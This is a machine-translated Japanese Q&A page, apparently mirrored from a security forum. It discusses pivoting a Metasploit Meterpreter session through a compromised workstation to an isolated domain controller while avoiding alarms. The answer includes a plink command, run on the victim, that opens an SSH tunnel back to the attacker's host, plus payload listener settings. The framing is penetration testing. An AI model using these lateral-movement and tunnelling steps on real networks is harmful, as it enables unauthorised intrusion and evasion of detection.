web-dev-qa-db-ja.com

Metasploit:インターネットアクセスなしでマシンにピボット

次の(珍しいことではない)シナリオを想像してみましょう。

  • 外からペンテストをしている
  • インフラストラクチャ内にある会社のPCからMeterpreterセッションを持っています(逆HTTPSと言いましょう)
  • ドメイン管理者のパスワードを知っているとしましょう[簡潔にするためです!]
  • DCに乗りたい
  • DCインターネットに接続できません

これについてどう思いますか?

最初の課題は、DCに引っ掛かることなくメータープリッターを取得することです。私の本能は、実行可能ファイルを作成し、それに署名して、それから本当にオールドスクールになることです。 "Net Use\DC\c $ ... "真ん中のマシン上でそれをコピーします。次に、" at "を使用してリモートでタスクをスケジュールします。それを行うためのより多くのメタスプロイティーな方法はありますか?psexec_ *モジュールはWindows Meterpreterでも機能しますか?

2番目の課題は次のとおりです。DCに接続し直すとどうなりますか?Meterpreterの名前付きパイプ機能を確実に機能させることができませんでした。MSFは、セッション、その後、真ん中のマシン上のmeterpreterプロセスがクラッシュします。おっと[編集:中間マシンがreverse_HTTPSを使用している場合にのみクラッシュします。reverse_tcpで動作し、奇妙なハングが残りますプロセスが残っています。バグレポートを提出しました。現在、これは本番稼働の準備ができているとは確信していません]

ポート転送?ミドルマシンのポートが転送し、DCがミドルマシンを介して私に接続しますか?HTTPS?コンピュータで新しいポートを開いても2018年は問題ありませんか?

両方が機能し、すべてのアラームを完全にトリガーしないこのシナリオの方法は何ですか?

windowsmetasploitmeterpreterpivoting
3
manduca

「ハックネイキッド」-ファイアウォールの問題がないことを確認してください。これで1ショットしか取得できない可能性があります。マシンにポートを転送する複雑さを理解してください。私はこれでうまくいくと思います...しかし、接続を確認できるようになったら、テストする必要があります。

  1. Plinkで被害者のPCにローカルポート転送を設定します。 (ウィンドウを想定)

    • 被害者は53や好きなものを聞きます(例として53を使用)
    • 被害者はXYZポートでホストに転送します
    • Msfまたはncを使用している場合は、リスナーをセットアップします。
    • 被害者の場合:plink -batch -l root -pw {password} yourip -p {22} -L 53:127.0.0.1:4444
    • {22}を中かっこで囲んでいるのは、そのポートでポート22を開くことができるかどうかがわからないためです。下りルールでは、発信SSHが許可されない場合があります。特にそれがMSオンリーショップの場合。特定のポートの22へのiptablesリダイレクトに頭を悩ますことも、sshd_configにリスニングポートを追加することもできます。後でデフォルトを復元することを忘れないでください。

  2. ペイロードを設定して、被害者のPCの開いているポートに接続します。被害者のポート53のポート転送トンネルがシステムのローカルポート4444で受信されることを前提としています。

    • LHOST = victim internal ip
    • LPORT = 53

  3. 接続を確認してから、ペイロードを配信して実行してください

1
Steve Kline